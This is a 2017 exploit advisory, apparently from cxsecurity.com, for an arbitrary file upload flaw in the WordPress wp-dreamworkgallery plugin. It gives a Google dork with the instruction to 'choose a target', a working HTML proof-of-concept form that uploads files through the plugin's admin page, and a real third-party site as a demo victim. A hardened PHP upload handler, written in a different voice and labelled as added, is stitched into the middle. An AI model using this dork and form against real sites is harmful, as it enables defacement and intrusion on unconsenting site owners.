Wordpress dreamwork_manage File Upload Vulnerability

Published: 2017.04.05
Credit: Anonymous Palestine
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:/wp-content/plugins/wp-dreamworkgallery

##################################################JokerSecurity################################
# Title : Wordpress File Upload Vulnerability
# Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
# Tested on: Kali Linux
# My YouTube channel : https://www.youtube.com/c/Professionalhacker25
# My blog : http://kader-information.blogspot.com/
# Video link : https://www.youtube.com/watch?v=h1xWghkVPEw
# Date: 2/04/2017
######################
# [+] DESCRIPTION :
######################
# 1: Search the Google dork and choose a target
###########
Code exploit :
###########
<html>
<body>
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="task" value="drm_add_new_album" />
  <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  <input type="file" name="album_img" value="" />
  <input type="submit" value="Submit" />
</form>
</body>
</html>
######
# 3: Upload your file (e.g. File.html)
######
Demo : http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
######################
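The PoC form above relies on the drm_add_new_album task accepting whatever arrives in album_img without checking its type. For comparison, here is a hardened handler for the same request fields, added for this advisory and not taken from the plugin: it requires the upload_files capability and a nonce, verifies the upload against an image allow-list by content, and hands the file to WordPress core for storage (the function names and the nonce field name drm_nonce are assumptions; the WordPress API calls are real).

```php
<?php
// Added example for this advisory, not wp-dreamworkgallery's own code.
// Function names and the nonce field name are assumptions; WP API calls are real.
// Dispatcher that the plugin's admin.php?page=dreamwork_manage callback would run.
function drm_hardened_manage_page() {
    if (isset($_POST['task']) && $_POST['task'] === 'drm_add_new_album') {
        drm_hardened_add_album();
    }
    // ... render the album list (omitted)
}

function drm_hardened_add_album() {
    // Authorisation: only users allowed to upload media reach this point.
    if (!current_user_can('upload_files')) {
        wp_die('Insufficient privileges', '', array('response' => 403));
    }
    // CSRF: the form must carry wp_nonce_field('drm_add_new_album', 'drm_nonce').
    check_admin_referer('drm_add_new_album', 'drm_nonce');
    if (empty($_FILES['album_img']['tmp_name'])) {
        wp_die('No file uploaded', '', array('response' => 400));
    }
    // Allow-list of image types, verified against file content rather than
    // the client-supplied name, so File.html or a .php renamed .jpg is rejected.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['album_img']['tmp_name'], $_FILES['album_img']['name'], $allowed
    );
    if (empty($check['ext']) || empty($check['type'])) {
        wp_die('Only JPEG, PNG or GIF images are accepted', '', array('response' => 415));
    }
    // Core moves the file into the uploads directory under a sanitised, unique
    // name; 'mimes' makes wp_handle_upload re-apply the allow-list.
    $upload = wp_handle_upload($_FILES['album_img'], array(
        'test_form' => false,
        'mimes'     => $allowed,
    ));
    if (isset($upload['error'])) {
        wp_die(esc_html($upload['error']), '', array('response' => 400));
    }
    $name = sanitize_text_field(wp_unslash($_POST['album_name'] ?? ''));
    $desc = sanitize_textarea_field(wp_unslash($_POST['album_desc'] ?? ''));
    // Persist $name, $desc and $upload['url'] with the plugin's storage (omitted).
    wp_safe_redirect(admin_url('admin.php?page=dreamwork_manage&added=1'));
    exit;
}
```

With this handler in place, the PoC request is refused at the nonce check, and even an authenticated user with a valid nonce cannot store a non-image file.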
Subscribe to my channel and my Facebook pages
# My blog : http://kader-information.blogspot.com/
# Facebook page 1 : https://www.facebook.com/AnonymousPalestine.vip
# Facebook page 2 : http://facebook.com/kali.linux.pentesting.tutorials
# Facebook page 3 : https://www.facebook.com/Professional.hacker.25
By <3 ##################################################JokerSecurity###############################

References:

https://www.facebook.com/AnonymousPalestine.vip/
https://www.youtube.com/watch?v=h1xWghkVPEw


Copyright 2017, cxsecurity.com